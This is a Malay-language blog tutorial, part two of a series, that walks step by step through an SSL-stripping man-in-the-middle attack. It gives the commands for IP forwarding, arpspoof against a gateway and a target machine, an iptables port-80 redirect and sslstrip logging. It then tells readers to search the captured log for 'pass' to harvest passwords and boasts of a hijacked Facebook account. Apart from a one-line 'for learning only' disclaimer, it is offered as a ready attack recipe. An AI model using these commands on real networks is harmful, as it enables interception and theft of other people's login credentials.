Pemecah Keselamatan SSL : Bahagian II


Salam dan selamat sejahtera, Ok, kali ini kita akan meneruskan pembelajaran terdahulu. Setelah artikel bahagian pertama, th3bAdh mengambil masa yang panjang untuk menyambungkan artikel tersebut kerana terdapat masalah/ hal-hal dunia yang lain, walaubagaimana pun,  Seperti yang dijanjikan, th3bAdh akan menceritakan penggunaan sslsniff bagi menggodam pengguna  facebook yang terdapat pada rangkaian sendiri sahaja . Perhatian ! Segala penerangan dan penulisan disini adalah bagi tujuan pembelajaran sahaja, dan saya tidak akan bertanggungjawab atas apa yang berlaku kepada anda. Tak nak cakap membebel-bebel dah, mana yang masih tak tahu, sila baca artikel bahagian I terlebih dahulu
Langkah : Buka terminal dan taip
echo 1 > /proc/sys/net/ipv4/ip_forward






Taip : arpspoof -i wlan0 –t
arpspoof –i wlan0 192.168.1.5


Penerangan : arpspoof –i wlan0 192.168.1.5

-i :adalah interface anda, sekiranya anda tidak pasti, taip ifconfig untuk kepastian,
192.168.1.5 : adalah alamat IP bagi network gateway, pastikan alamat gateway anda tepat bagi mengalih data –data trafik, pastikan ianya betul,(sekiranya tersilap, ianya tidak akan menjadi)

Tambahan : sekiranya anda mahu menyerang pada komputer yang hendak diserang sahaja, tambahkan baris perintah –t sebelum alamat IP gateway, contoh :
Arpspoof –i wlan0 –t 192.168.1.12 192.168.1.5
Selepas dimasukkan baris perintah diatas, biarkan ianya berjalan (tidak perlu ditutup)


 Kita beralih langkah seterusnya, buka terminal baru dan taip


iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000





Tanpa perlu menutup terminal tadi, taipkan
 python /pentest/web/sslstrip.py –w ssl




Penerangan selepas baris perintah –w : anda boleh menamakan apa sahaja nama yang suka, tetapi pastikan ia format text contoh ssl.txt  bagi menyimpan output. Sekiranya telah berjaya, anda boleh membuka file tersebut di dalam folder /pentest/web/sslstrip.

Bagi memudahkan pencarian yang terdapat kata laluan anda boleh mencari kata (Ctrl+F) taip “pass”



Gambar diatas adalah salah satu akaun facebook yang telah berjaya digodam di dalam sesebuah rangkaian sendiri, ianya tidak dihadkan untuk memecah facebook sahaja,ianya boleh digunakan untuk memecah kesemua keselamatan SSL,

Ok itu sahaja lah bagi tutorial kali, bagi tutorial akan datang th3bAdh akan menulis untuk OS Windows pula (kena tunggu bahagian III), ada juga  ke bagi windows?? Tunggu bahagian akan datang, jangan ketinggalan...hahahha
Powered by Blogger.